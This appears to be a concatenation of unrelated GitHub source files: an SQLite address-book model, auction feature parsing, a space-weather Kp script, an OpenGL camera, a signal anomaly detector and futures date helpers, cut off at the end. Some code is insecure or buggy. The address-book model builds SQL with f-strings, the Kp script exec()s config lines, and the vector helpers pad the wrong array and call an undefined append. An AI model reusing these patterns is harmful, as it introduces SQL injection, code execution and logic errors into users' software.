address in the DB\n \"\"\"\n addrs = set()\n ids = self.get_address_ids()\n for addr in ids:\n addrs.add(addr[0])\n\n if self.address_name not in addrs:\n return 1500\n\n del addrs\n query = f\"\"\"\n UPDATE address_book\n SET coordinates = '{self.coordinates}'\n WHERE address_name = '{self.address_name}';\n \"\"\"\n\n try:\n logging.info(db_curr.execute(query))\n\n except sqlite3.Error as err:\n logging.error(err)\n\n self.commit()\n\n return True\n\n def get_address_in_range(self, rang, location):\n \"\"\"\n Method to get the addresses within the given distance\n and location from sqlite database\n\n \"\"\"\n location = location.split(\",\")\n latitude = float(location[0].strip())\n longitude = float(location[1].strip())\n\n point = (latitude, longitude)\n\n addresses_within_range = []\n all_addresses = self.get_address_ids()\n\n for address in all_addresses:\n address_point = address[1].split(\",\")\n address_point = (float(address_point[0]), float(address_point[1]))\n\n diff = geodesic(point, address_point)\n logging.info(f\"Location:{location}\")\n logging.info(f\"Address point: {address_point} -- \\\n Range:{range} -- Difference: {diff}\")\n\n if diff <= rang:\n addresses_within_range.append(address)\n\n return addresses_within_range\n\n @staticmethod\n def commit():\n \"\"\"\n Method to commit the changes done on the database\n\n \"\"\"\n db_conn.commit()\n\n @staticmethod\n def close():\n \"\"\"\n Method to close the database connection\n \"\"\"\n db_conn.close()\n\n @staticmethod\n def get_address_ids():\n \"\"\"\n Method to get all the address names present in the DB\n \"\"\"\n try:\n db_curr.execute(\"\"\"SELECT address_name, coordinates\n FROM address_book;\"\"\")\n rows = db_curr.fetchall()\n return rows\n except sqlite3.Error as err:\n logging.error(err)\n","repo_name":"mallik18/AddressBook","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31171169831","text":"def ficha(nome='', gol=0,):\n print( f'O jogador {nome} fez {gol} gol(s) no campeonato.')\n\n\nnomeJogador = str(input('Nome do jogador: '))\nnumGols = str(input('Número de gols: '))\nif numGols.isnumeric():\n numGols = int(numGols)\nelse:\n numGols = 0\nif nomeJogador.strip() == '':\n ficha(gol=numGols)\nelse:\n ficha(nomeJogador, numGols)\n","repo_name":"Nadirlene/Exercicios-python","sub_path":"Exerciciospython2/Função 02/e103.py","file_name":"e103.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6334152351","text":"\"\"\"\nDefine the method to parse variables \"bidderid\", \"verticalid\", \"bidfloor\", \"format\", \"product\", \"w\", and \"h\"\n\"\"\"\n\nimport Shared as sd\n\nformats_ = [16, 31, 9, 12, 14, 3, 2, 7, 5, 21, 8, 20, 15, 6, 22, 27, 25, 26, 30, 13, 23]\n\n# (\"w\", \"h\") is set to (-1, -1) to indicate missing banners\nbanners_ = [(300, 250), (728, 90), (160, 600), (320, 50), (300, 600), (970, 90), (468, 60), (234, 60),\n (13, 13), (12, 12), (17, 17), (18, 18), (10, 10), (300, 120), (16, 16), (250, 100), (19, 19), (320, 480),\n (250, 70), (0, 0), (450, 100), (21, 21), (20, 20), (400, 400), (300, 100), (-1, -1)]\n\n\ndef process(margin, entry, result, mode):\n \"\"\"\n Given a JSON object formatted by Extractor.py, parse variables \"bidderid\", \"verticalid\", \"bidfloor\", \"format\", \"product\", \"w\", and \"h\",\n and the results to the list of 
possible results.\n :param entry: the JSON object that represents one impression\n :param result: the list of possible results\n :return: None\n \"\"\"\n\n # Auction - Bidrequests - bidder id\n bidder_id = entry[\"bidderid\"]\n if bidder_id == 36: # Adjusting the index for DSP 36 since we ignore DSP 35 and 37\n bidder_id = 35\n sd.binarize(result, bidder_id-1, 35)\n\n # Auction - Bidrequests - vertical id\n sd.binarize(result, entry[\"verticalid\"]-1, 16)\n\n # Auction - Bidrequests - Impressions - bid Floor\n bid_floor = round(float(entry[\"bidfloor\"]), 2)\n\n if bid_floor-margin == 0:\n result.append(0)\n else:\n result.append(1)\n\n # If bid floor is to be parsed into binary format, create a boolean variable for every interval of size 0.5 from 0 to 28,\n # and according to the value of the bid floor, set the associated boolean variable to 1.\n # Otherwise, just record the value of bid floor.\n if mode == \"bin\":\n index = 0\n if bid_floor < 28:\n index = int(bid_floor*20)\n bid_floor_list = [0]*560\n bid_floor_list[index] = 1\n result.extend(bid_floor_list)\n else:\n result.append(bid_floor)\n\n # Determine if bid floor is a multiple of 0.05 or of 0.1\n for n in [20, 10]:\n bid_floor_tmp = n*bid_floor\n if bid_floor_tmp == int(bid_floor_tmp):\n result.append(1)\n else:\n result.append(0)\n\n # Determine if bid floor is greater than the values in thres_list\n index = 0\n thres_list = [1.5, 2, 2.5, 3, 28]\n for thres in thres_list:\n if bid_floor > thres:\n result.append(1)\n index += 1\n else:\n n = len(thres_list) - index\n result.extend([0]*n)\n break\n\n # Auction - Bidrequests - Impressions - format\n sd.binarize(result, formats_.index(entry[\"format\"]), len(formats_))\n\n # Auction - Bidrequests - Impressions - product\n sd.binarize(result, entry[\"product\"]-1, 6)\n\n # Auction - Bidrequests - Impressions - banner\n width = entry[\"w\"]\n height = entry[\"h\"]\n\n # Determine if banner belongs to any of the following types:\n # 1) h in (0, 200] and w in (0, 500]\n # 2) h in (0, 200] and w in (500, infinity)\n # 3) h in (200, infinity) and w in (0, 500]\n banner_cat = [0, 0, 0]\n if 0 < height <= 200:\n if 0 < width <= 500:\n banner_cat[0] = 1\n elif width > 500:\n banner_cat[1] = 1\n elif (height > 200) and (width <= 500):\n banner_cat[2] = 1\n\n sd.add_to_result(result, (width, height), banners_)\n result.extend(banner_cat)\n\n\ndef get_hearder():\n \"\"\"\n Return the names of features extracted in this section, and the number of variables used to represent each feature.\n :return: a list of tuples containing the feature names and the lengths of the corresponding features\n \"\"\"\n bidder_id = (\"bidder_id\", 35)\n vertical_id = (\"vertical_id\", 16)\n bid_floor = (\"bid_floor\", 9)\n format = (\"format\", len(formats_))\n product = (\"product\", 6)\n banner = (\"banner\", 3+len(banners_)+1)\n\n return [bidder_id, vertical_id, bid_floor, format, product, banner]","repo_name":"wlu673/gumgum","sub_path":"Preprocessing/Auction_BidRequests.py","file_name":"Auction_BidRequests.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39486565186","text":"def Set_equal_dimensions_2_IQ(vect1,vect2):\n\t##this fuction adds 0 to the shorter array in order to \n\t## have same dimension in both arrays\n\tlen1 = len(vect1)\n\tlen2 = len(vect2)\n\tif(len1>len2):\n\t\tfor i in range(len1-len2):\n\t\t\tvect2.append(0)\n\tif(len2>len1):\n\t\tfor i in 
range(len2-len1):\n\t\t\tvect2.append(0)\n\n\treturn(vect1,vect2)\n\n\ndef operating_array(vect1,vect2,operation):\n\tif(operation==\"dot product\"):\n\t\tdotProduct=[]\n\t\tfor i in range(int(len(vect1))):\n\t\t\tdotProduct.append(vect1[i]*vect2[i])\n\t\treturn dotProduct\n\telif(operation==\"substraction\"):\n\t\tSubstraction=[]\n\t\tfor i in range(int(len(vect1))):\n\t\t\tSubstraction.append(vect1[i]-vect2[i])\n\t\treturn Substraction\n\telif(operation==\"sumation\"):\n\t\tSum=[]\n\t\tfor i in range(int(len(vect1))):\n\t\t\tsum.append(vect1[i]+vect2[i])\n\t\treturn Sum","repo_name":"bobinaman/SDR_NASA","sub_path":"Math_Functions.py","file_name":"Math_Functions.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9635325832","text":"#!/proj/sot/ska3/flight/bin/python\n\n#####################################################################################################\n# #\n# update_solor_wind_data.py: copy kp data and create a file to match in the required format #\n# #\n# author: t. isobe (tisobe@cfa.harvard.edu) #\n# #\n# last updae: Mar 16, 2021 #\n# #\n#####################################################################################################\n\nimport os\nimport sys\nimport re\nimport string\nimport math\nimport numpy\nimport time\nfrom datetime import datetime\nfrom time import gmtime, strftime, localtime\nimport Chandra.Time\n\npath = '/data/mta4/Space_Weather/house_keeping/dir_list'\n\nwith open(path, 'r') as f:\n data = [line.strip() for line in f.readlines()]\n\nfor ent in data:\n atemp = re.split(':', ent)\n var = atemp[1].strip()\n line = atemp[0].strip()\n exec(\"%s = %s\" %(var, line))\n#for writing out files in test directory\nif (os.getenv('TEST') == 'TEST'):\n os.system('mkdir -p TestOut')\n test_out = os.getcwd() + '/TestOut'\n\n#---------------------------------------------------------------------------------------\n#-- get_kp: copy kp data and create a file to match in the required format --\n#---------------------------------------------------------------------------------------\n\ndef get_kp():\n \"\"\"\n copy kp data and create a file to match in the required format\n input: none but read from: /data/mta4/proj/rac/ops/KP/k_index_data\n output: /solar_wind_data.txt\n \"\"\"\n#\n#--- find out the last update time\n#\n data_dir = kp_dir + 'Data/'\n\n datafilep = data_dir + '/solar_wind_data_past.txt'\n datafile = data_dir + '/solar_wind_data.txt'\n odata = read_data_file(datafilep)\n at = re.split('\\s+', odata[-1])\n otime = at[0] + ':' + at[1] + ':' + at[2] + ':' + at[3][0] \n otime = otime + at[3][1] + ':' + at[3][2] + at[3][3] + ':00'\n otime = datetime.strptime(otime, \"%Y:%m:%d:%H:%M:%S\").strftime(\"%Y:%j:%H:%M:%S\")\n otime = Chandra.Time.DateTime(otime).secs\n#\n#--- read kp data file\n#\n ifile = kp_dir + 'Data/k_index_data_past'\n data = read_data_file(ifile)\n#\n#--- find the part which are not in the data\n#\n line = ''\n for ent in data:\n atemp = re.split('\\s+', ent)\n ltime = float(atemp[0])\n l_time = ltime\n if ltime > otime:\n kval = atemp[1]\n \n ltime = Chandra.Time.DateTime(ltime).date\n mc = re.search('\\.', ltime)\n if mc is not None:\n btemp = re.split('\\.', ltime)\n ltime = btemp[0]\n \n ldate = datetime.strptime(ltime, '%Y:%j:%H:%M:%S').strftime(\"%Y %m %d %H%M\")\n \n line = line + ldate + '\\t\\t' + ldate + '\\t\\t' + kval + '\\t\\t\\t' \n line = line + ldate + '\\t\\t' + kval + '\\t\\t' + kval + '\\n'\n#\n#--- if there is 
new data, update\n#\n appendfile = datafilep\n #for writing out files in test directory\n if (os.getenv('TEST') == 'TEST'):\n appendfile = test_out + \"/\" + os.path.basename(appendfile)\n if line != '':\n fo = open(appendfile, 'a')\n fo.write(line)\n fo.close()\n\n cmd = 'cp -f ' + datafilep + ' ' + datafile\n os.system(cmd)\n else:\n exit(1)\n#\n#--- add predictive kp data file\n#\n ifile = kp_dir + 'Data/k_index_data'\n data = read_data_file(ifile)\n\n line = ''\n for ent in data:\n atemp = re.split('\\s+', ent)\n ltime = float(atemp[0])\n if ltime <= l_time:\n continue\n\n kval = atemp[1]\n \n ltime = Chandra.Time.DateTime(ltime).date\n mc = re.search('\\.', ltime)\n if mc is not None:\n btemp = re.split('\\.', ltime)\n ltime = btemp[0]\n \n ldate = datetime.strptime(ltime, '%Y:%j:%H:%M:%S').strftime(\"%Y %m %d %H%M\")\n \n line = line + ldate + '\\t\\t' + ldate + '\\t\\t' + kval + '\\t\\t\\t' \n line = line + ldate + '\\t\\t' + kval + '\\t\\t' + kval + '\\n'\n#\n#--- if there is new data, update\n#\n appendfile = datafile\n #for writing out files in test directory\n if (os.getenv('TEST') == 'TEST'):\n appendfile = test_out + \"/\" + os.path.basename(appendfile)\n if line != '':\n with open(appendfile, 'a') as fo:\n fo.write(line)\n\n#---------------------------------------------------------------------------------------\n#---------------------------------------------------------------------------------------\n#---------------------------------------------------------------------------------------\n\ndef read_data_file(ifile):\n\n with open(ifile, 'r') as f:\n data = [line.strip() for line in f.readlines()]\n\n return data\n\n#---------------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n\n get_kp()\n\n","repo_name":"chandra-mta/Space_Weather_New","sub_path":"KP/Scripts/update_solor_wind_data.py","file_name":"update_solor_wind_data.py","file_ext":"py","file_size_in_byte":5357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"402199359","text":"# calculate dist between 2 points\ndef getDist(p1, p2):\n return (p2[0] - p1[0])**2 + (p2[1] - p1[1])**2\n\n# permutations of nP2\n\n\ndef getCount(n):\n return n * (n - 1)\n\n# logic is to keep track of number of pairs which has the same distance between them\n# then boomerang count will be nP2 of that pair count\n\n# O(N^2)\n\n\ndef numberOfBoomerangs(points) -> int:\n n = len(points)\n boomCount = 0\n distFreq = dict()\n for i in range(n):\n distFreq.clear()\n for j in range(n):\n if j == i:\n continue\n\n d = getDist(points[i], points[j])\n if d not in distFreq:\n distFreq[d] = 1\n else:\n distFreq[d] += 1\n\n for v in distFreq.values():\n boomCount += getCount(v)\n\n return boomCount\n\n\np = [[0, 0], [1, 0], [-1, 0], [0, 1], [0, -1]]\nprint(numberOfBoomerangs(p))\n","repo_name":"SahilDeb/6Companies30days","sub_path":"Goldman_Sachs_2/BoomerangCount.py","file_name":"BoomerangCount.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19817992550","text":"import os\nimport pathlib\nimport re\nimport shutil\nimport tempfile\n\nfrom aitemplate.backend import registry\n\n# from . 
import extra_conv_emit, extra_cutlass_generator, extra_enum\n\n# pylint: disable=C0103,C0415,W0707\n\n\nclass Args:\n def __init__(self, arch):\n self.operations = \"all\"\n self.build_dir = \"\"\n self.curr_build_dir = \"\"\n self.rocm_version = \"5.0.2\"\n self.generator_target = \"\"\n self.architectures = arch\n self.kernels = \"all\"\n self.ignore_kernels = \"\"\n self.kernel_filter_file = None\n self.selected_kernel_list = None\n self.interface_dir = None\n self.filter_by_cc = True\n\n\n@registry.reg(\"rocm.make_ck_lib\")\ndef mk_ck_lib(src_prefix, dst_prefix=None):\n if dst_prefix is None:\n dst_prefix = tempfile.mkdtemp()\n lib_dst = os.path.join(dst_prefix, \"ck_lib\")\n if pathlib.Path(lib_dst).is_dir():\n shutil.rmtree(lib_dst)\n\n os.makedirs(lib_dst)\n with open(os.path.join(lib_dst, \"__init__.py\"), \"w\") as fo:\n fo.write(\"from . import library\\n\")\n fo.write(\"from . import generator\\n\")\n fo.write(\"from . import manifest\\n\")\n fo.write(\"from . import gemm_operation\\n\")\n fo.write(\"from . import conv2d_operation\\n\")\n\n def process_code(src_path, dst_path, code_set):\n pattern = re.compile(r\"from\\s([a-z_0-9]+)\\simport \\*\")\n with open(src_path) as fi:\n lines = fi.readlines()\n output = []\n\n for line in lines:\n match = pattern.match(line)\n if match is not None:\n name = match.groups()[0]\n if name + \".py\" in code_set:\n line = \"from .{name} import *\\n\".format(name=name)\n output.append(line)\n # if \"library.py\" in dst_path:\n # lines = extra_enum.emit_library()\n # output.append(lines)\n # if \"conv2d_operation.py\" in dst_path:\n # lines = extra_conv_emit.emit_library()\n # output.append(lines)\n with open(dst_path, \"w\") as fo:\n fo.writelines(output)\n\n srcs = os.listdir(src_prefix)\n for file in srcs:\n src_path = os.path.join(src_prefix, file)\n if not os.path.isfile(src_path):\n continue\n dst_path = os.path.join(lib_dst, file)\n process_code(src_path, dst_path, srcs)\n\n # extra configs\n # dst_path = os.path.join(lib_dst, \"extra_operation.py\")\n # with open(dst_path, \"w\") as fo:\n # code = extra_ck_generator.emit_library()\n # fo.write(code)\n return dst_prefix\n\n\n@registry.reg(\"rocm.gen_ck_ops\")\ndef gen_ops(arch):\n import ck_lib\n\n args = Args(arch)\n manifest = ck_lib.manifest.Manifest(args)\n try:\n func = getattr(ck_lib.generator, \"Generate\" + arch.upper())\n func(manifest, args.rocm_version)\n except AttributeError as exc:\n raise NotImplementedError(\n \"Arch \" + arch + \" is not supported by current cklib lib.\"\n ) from exc\n return manifest.operations\n","repo_name":"facebookincubator/AITemplate","sub_path":"python/aitemplate/backend/rocm/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"} +{"seq_id":"3119979059","text":"from __future__ import division\r\n\r\nfrom math import sin, cos\r\n\r\nfrom OpenGL import GL as gl, GLU as glu\r\n\r\n\r\nclass Camera(object):\r\n\r\n def __init__(self, x=0.0, y=0.0, zoom=10.0):\r\n self.x = x\r\n self.y = y\r\n self.zoom = zoom\r\n self.angle = 0.0\r\n\r\n def world_projection(self, width, height):\r\n '''\r\n Screen's shortest dimension (usually height) will show exactly\r\n self.zoom of the world in each direction from the center of the screen,\r\n regardless of screen resolution\r\n '''\r\n aspect = width / height\r\n\r\n def getOrtho2DBounds():\r\n left = bottom = -self.zoom\r\n right = top = self.zoom\r\n if width > height: # widescreen\r\n left 
*= aspect\r\n right *= aspect\r\n elif width < height: # tallscreen\r\n bottom /= aspect\r\n top /= aspect\r\n return left, right, bottom, top\r\n\r\n gl.glMatrixMode(gl.GL_PROJECTION)\r\n gl.glLoadIdentity()\r\n glu.gluOrtho2D(*getOrtho2DBounds())\r\n\r\n\r\n def look_at(self):\r\n gl.glMatrixMode(gl.GL_MODELVIEW)\r\n gl.glLoadIdentity()\r\n glu.gluLookAt(\r\n self.x, self.y, +1.0,\r\n self.x, self.y, -1.0,\r\n sin(self.angle), cos(self.angle), 0.0)\r\n\r\n","repo_name":"tartley/pyong","sub_path":"pyong/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19990370437","text":"from functools import partial\r\nimport multiprocessing\r\nimport os\r\nfrom abc import ABC, abstractmethod\r\nfrom dataclasses import dataclass, field\r\nfrom enum import Enum\r\nfrom math import ceil, floor\r\nfrom pathlib import Path\r\nfrom typing import Callable, Self\r\n\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport wfdb\r\nfrom matplotlib import pyplot as plt\r\nfrom numpy import typing as npt\r\nfrom scipy.signal import cwt, find_peaks, ricker\r\nfrom src.config import AnomalyConfig, load_config\r\n\r\nfrom copy import deepcopy\r\n\r\nPEAK_COLOR = \"r\"\r\n\r\n\r\nclass AnomalyType(str, Enum):\r\n max = \"max\"\r\n min = \"min\"\r\n line = \"line\"\r\n peak_count = \"peaks\"\r\n\r\n def __str__(self) -> str:\r\n return self.value\r\n\r\n\r\nclass SignalType(str, Enum):\r\n icp = \"ICP\"\r\n abp = \"ABP\"\r\n\r\n def __str__(self) -> str:\r\n return self.value\r\n\r\n\r\n@dataclass()\r\nclass Anomaly(ABC):\r\n start: float\r\n end: float\r\n\r\n @abstractmethod\r\n def extend(self, other: Self):\r\n ...\r\n\r\n def overlap(self, other: \"SingleAnomaly | MergedAnomalies\") -> float:\r\n \"\"\"\r\n measuring overlapping area\r\n\r\n Args:\r\n other (Self): other measuret segment\r\n\r\n Returns:\r\n float: overlapped area relative to other\r\n \"\"\"\r\n # if self.end < other.start or other.end < self.start:\r\n # return 0\r\n if self.start < other.start or self.end > other.end:\r\n self,other = other, self # type: ignore\r\n if other.length() == 0:\r\n if self.start <= other.start and self.end >= other.end:\r\n return 1\r\n return 0\r\n if self.end <= other.start or self.start >= other.end : # check if the there is so overlap\r\n return 0\r\n return max((min(self.end,other.end) - max(other.start,self.start)) / other.length(),0)\r\n \r\n def distance(self, other: \"SingleAnomaly | MergedAnomalies\") -> float:\r\n if self.overlap(other) > 0:\r\n return 0\r\n return max(self.start, other.start) - min(self.end, other.end)\r\n\r\n def length(self) -> float:\r\n return max(self.end - self.start, 0) \r\n\r\n\r\n@dataclass\r\nclass SingleAnomaly(Anomaly):\r\n type: AnomalyType\r\n\r\n def extend(self, other: Self) -> None:\r\n if not self.type == other.type:\r\n return\r\n if self.start > other.start:\r\n self.start = other.start\r\n if self.end < other.end:\r\n self.end = other.end\r\n\r\n def convert(self) -> \"MergedAnomalies\":\r\n return MergedAnomalies(self.start, self.end, {self.type : [self]})\r\n\r\n def __str__(self) -> str:\r\n return f\"{self.start}-{self.end}: {str(self.type)}\"\r\n\r\n\r\n@dataclass\r\nclass MergedAnomalies(Anomaly):\r\n type: dict[AnomalyType,list[SingleAnomaly]]\r\n\r\n def extend(self, other: SingleAnomaly| Self):\r\n if self.start > other.start:\r\n self.start = other.start\r\n\r\n if self.end < other.end:\r\n self.end = other.end\r\n\r\n if 
isinstance(other, SingleAnomaly):\r\n if other.type == AnomalyType.line:\r\n ...\r\n self._extend_anomaly(other)\r\n\r\n else:\r\n for key in other.type:\r\n if key == AnomalyType.line:\r\n ...\r\n anomalies = other.type[key]\r\n for anomaly in anomalies:\r\n self._extend_anomaly(anomaly)\r\n \r\n \r\n\r\n def __str__(self) -> str:\r\n return f\"{self.start}-{self.end}: {', '.join(list(self.type))}\"\r\n \r\n def length(self,type:AnomalyType | None = None) -> float:\r\n if type:\r\n if not self.type.get(type):\r\n return 0.\r\n return sum([anomaly.length() for anomaly in self.type[type]])\r\n return self.end - self.start\r\n \r\n def _extend_anomaly(self,other: SingleAnomaly):\r\n if other.type == AnomalyType.line:\r\n ...\r\n anomalies = self.type.get(other.type)\r\n if not anomalies:\r\n self.type[other.type] = [other]\r\n else:\r\n overlaps = []\r\n distances = []\r\n for anomaly in self.type[other.type]:\r\n overlaps.append(other.overlap(anomaly))\r\n distances.append(other.distance(anomaly))\r\n id = overlaps.index(max(overlaps))\r\n if overlaps[id] == 0:\r\n id_dist = distances.index(min(distances))\r\n if distances[id_dist] <= load_config().distance:\r\n anomalies[id_dist].extend(deepcopy(other))\r\n else:\r\n anomalies.append(deepcopy(other))\r\n else:\r\n anomalies[id].extend(deepcopy(other))\r\n\r\n @classmethod\r\n def join(cls, *arg: SingleAnomaly | Self) -> Self:\r\n start = min([anomaly.start for anomaly in arg])\r\n end = max([anomaly.end for anomaly in arg])\r\n tmp = cls(start,end,{})\r\n\r\n for anomaly in arg:\r\n if isinstance(anomaly,MergedAnomalies):\r\n for key in anomaly.type.keys():\r\n for single_anomaly in anomaly.type[key]:\r\n tmp.extend(single_anomaly)\r\n else:\r\n tmp.extend(anomaly)\r\n\r\n return tmp\r\n\r\n\r\n\r\ndef window_average(values: npt.NDArray, window_size: int) -> tuple[npt.NDArray, float]:\r\n for idx, window in enumerate(np.lib.stride_tricks.sliding_window_view(values, window_size)[window_size:]):\r\n values[window_size + idx] = window.mean()\r\n\r\n peaks = find_peaks(values)\r\n return values, len(peaks)\r\n\r\n\r\ndef find_peaks_filtered(values: npt.NDArray, wavelet_len: float, wavelet: Callable):\r\n filtered = cwt(values, wavelet, [wavelet_len])\r\n return find_peaks(filtered[0])[0]\r\n\r\n\r\n@dataclass\r\nclass Signal:\r\n signal: npt.NDArray\r\n fs: int # sampling frequency of the signal\r\n peaks_per_second: float\r\n path: Path\r\n window_indexes: npt.NDArray = field(init=False)\r\n wavelet: Callable\r\n wavelet_len: float\r\n\r\n @classmethod\r\n def load_signal(\r\n cls,\r\n path: Path,\r\n type: SignalType,\r\n cpu_count: int | None = os.cpu_count(),\r\n wavelet_len: float = 5,\r\n wavelet: Callable = ricker,\r\n ):\r\n \"\"\"\r\n load the signal file into memory\r\n\r\n Args:\r\n path (Path): path to the signal file\r\n type (SignalType): which signal from file load\r\n\r\n Returns:\r\n Signal: signal object with loaded signal\r\n \"\"\"\r\n cpu_count = cpu_count if cpu_count else 1\r\n signals, fields = wfdb.rdsamp(path)\r\n\r\n signal_type = fields[\"sig_name\"].index(type.value)\r\n signal: npt.NDArray = signals[:, signal_type].astype(np.float64)\r\n del signals\r\n\r\n split = np.array_split(signal, cpu_count)\r\n # filtered_signal, peaks = window_average(signal,average_window_size)\r\n\r\n # peaks_per_second = peaks / (len(signal)/fields[\"fs\"])\r\n\r\n peak_finding = partial(find_peaks_filtered, wavelet_len=wavelet_len, wavelet=ricker)\r\n\r\n # preprocess signal in parallel on splitted signal\r\n with 
multiprocessing.Pool(cpu_count) as pool:\r\n preprocessed_signal = pool.map(peak_finding, split)\r\n\r\n peaks_per_second = np.sum([len(peaks_window) for peaks_window in preprocessed_signal]) / (len(signal) / fields[\"fs\"])\r\n\r\n return cls(\r\n signal=signal,\r\n fs=fields[\"fs\"],\r\n peaks_per_second=peaks_per_second,\r\n path=path,\r\n wavelet=wavelet,\r\n wavelet_len=wavelet_len,\r\n )\r\n\r\n def look(self, start: float, end: float, peaks: bool = True):\r\n \"\"\"\r\n Open graph window with time series of the signal in specified range. Unit are in the seconds\r\n\r\n Args:\r\n start (float): start of the range (in seconds)\r\n end (float): end of the range (in seconds)\r\n peaks (bool, optional): Whether to visualize peaks. Defaults to True.\r\n \"\"\"\r\n _, axes = plt.subplots()\r\n values = self.signal[ceil(start * self.fs) : floor(end * self.fs)]\r\n sns.lineplot(y=values, x=np.arange(start, end, 1 / self.fs), ax=axes)\r\n if peaks:\r\n found_peaks = find_peaks_filtered(values, self.wavelet_len, self.wavelet)\r\n sns.scatterplot(x=(found_peaks / self.fs) + start, y=[values[t] for t in found_peaks], ax=axes, color=PEAK_COLOR)\r\n plt.show(block=True)\r\n\r\n def check(\r\n self,\r\n anomaly: AnomalyType,\r\n th: float,\r\n config: AnomalyConfig,\r\n window_size: float = 5,\r\n stride: float | None = None,\r\n ) -> list[SingleAnomaly]:\r\n anomalies: list[SingleAnomaly] = []\r\n detected = False\r\n index = 0\r\n start = 0\r\n window_size = floor(window_size * self.fs)\r\n stride = floor(stride * self.fs) if stride else 1\r\n self.window_indexes = np.arange(0, window_size, 1)\r\n prev_anomaly: SingleAnomaly | None = None\r\n\r\n for idx, window in enumerate(np.lib.stride_tricks.sliding_window_view(self.signal, window_size)[::stride, :]):\r\n anomaly_index = getattr(self, f\"filter_{anomaly}\")(window, th=th)\r\n if isinstance(anomaly_index,tuple):\r\n if not detected:\r\n start = anomaly_index[0] + idx * stride\r\n detected = True\r\n index =idx * stride + anomaly_index[1]\r\n elif detected:\r\n current_anomaly = SingleAnomaly(start / self.fs, index / self.fs, anomaly)\r\n if prev_anomaly and prev_anomaly.distance(current_anomaly) <= config.distance:\r\n prev_anomaly.extend(current_anomaly)\r\n continue\r\n \r\n anomalies.append(current_anomaly)\r\n prev_anomaly = current_anomaly\r\n detected = False\r\n\r\n if detected:\r\n current_anomaly = SingleAnomaly(start / self.fs, index / self.fs, anomaly)\r\n if prev_anomaly and prev_anomaly.distance(current_anomaly) <= config.distance:\r\n prev_anomaly.extend(current_anomaly)\r\n else:\r\n anomalies.append(current_anomaly)\r\n\r\n\r\n return anomalies\r\n\r\n # === filtering functions===\r\n def filter_max(\r\n self,\r\n window: npt.NDArray,\r\n th: int = 90,\r\n ) -> tuple[int,int]| None:\r\n idx = np.argwhere(window >= th)\r\n if idx.size > 0 :\r\n return idx[0][0], idx[0][-1]\r\n\r\n def filter_min(self, window: npt.NDArray, th: int = -30) -> tuple[int,int] | None:\r\n idx = np.argwhere(window <= th)\r\n if idx.size > 0 :\r\n return idx[0][0], idx[0][-1]\r\n\r\n def filter_line(self, window: npt.NDArray, th: float = 0.03) -> tuple[int,int] | None:\r\n coef = np.polynomial.polynomial.Polynomial.fit(self.window_indexes, window, 1)\r\n if np.sqrt(np.power(coef(window) - window, 2)).mean() < th:\r\n return 0, window.shape[0]\r\n\r\n def filter_peaks(self, window: npt.NDArray, th: float = 0.5) -> tuple[int,int]| None:\r\n peaks = find_peaks_filtered(window, self.wavelet_len, self.wavelet)\r\n seconds = len(window) / self.fs\r\n 
peaks_per_second = len(peaks) / seconds\r\n\r\n if peaks_per_second > self.peaks_per_second * (1 + th) or peaks_per_second < self.peaks_per_second * (1 - th):\r\n return 0, window.shape[0]\r\n\r\n # ==========================\r\n","repo_name":"daviholy/aso1","sub_path":"src/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":11478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17043346424","text":"# -*- coding: utf-8 -*-\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 3 11:20:31 2017\n\n@author: Heng\n\"\"\"\n\nimport calendar\nfrom datetime import timedelta\n\n\nimport pandas as pd \nfrom enum import Enum\n\n\ndef toMonthCode(ticker,monthCode):\n tickerCode = list()\n for t in ticker:\n code = monthCode[t]\n tickerCode.append(code)\n\n return tickerCode\n \n \n#def generateTrade(signal_list,mktData,risk_limit,long_bond,short_bond,today):\n# raw_trades = list()\n# #t1 = trade(\"X08\",10,1.25,today)\n# for key in list(signal_list.index):\n# s = signal_list.loc[key]['signal']\n# amount = 10 if s= 15 else d + timedelta(weeks=1)\n \ndef contractDate(d,n):\n Maturity = list()\n \n Exp_thisMonth = calendar.Calendar(2).monthdatescalendar(d.year, d.month)[3][0]\n if Exp_thisMonth >= d:\n Maturity.append(Exp_thisMonth)\n else:\n Maturity.append(next_third_Wednesday(Exp_thisMonth))\n \n for i in range(n-1):\n Maturity.append(next_third_Wednesday(Maturity[i]))\n \n return Maturity\n\ndef expiryCalc(ticker,today):\n dates = contractDate(today,7)\n monthMap = {\"F\":1, \"G\":2, \"H\":3,\"J\":4,\"K\":5, \"M\":6, \"N\":7,\"Q\":8,\"U\":9, \"V\":10, \"X\":11,\"Z\":12}\n code = ticker.split(\"_\") \n month = monthMap[code[1][0]]\n for date in dates:\n if month == date.month : expiry = date - today\n \n return expiry.days\n\n\n\n \ndef contractCode(d,n):\n monthcode = {1:\"F\", 2:\"G\", 3:\"H\",4:\"J\",5:\"K\", 6:\"M\", 7:\"N\",8:\"Q\",9:\"U\", 10:\"V\", 11:\"X\",12:\"Z\"}\n dates = contractDate(d,n)\n code_list = list(map(lambda aday: monthcode[aday.month] + str(aday.year)[2:],dates))\n code = dict()\n contract_list = ['f1','f2','f3','f4','f5','f6','f7']\n for i in range(len(code_list)):\n code[contract_list[i]] = code_list[i]\n\n for i in 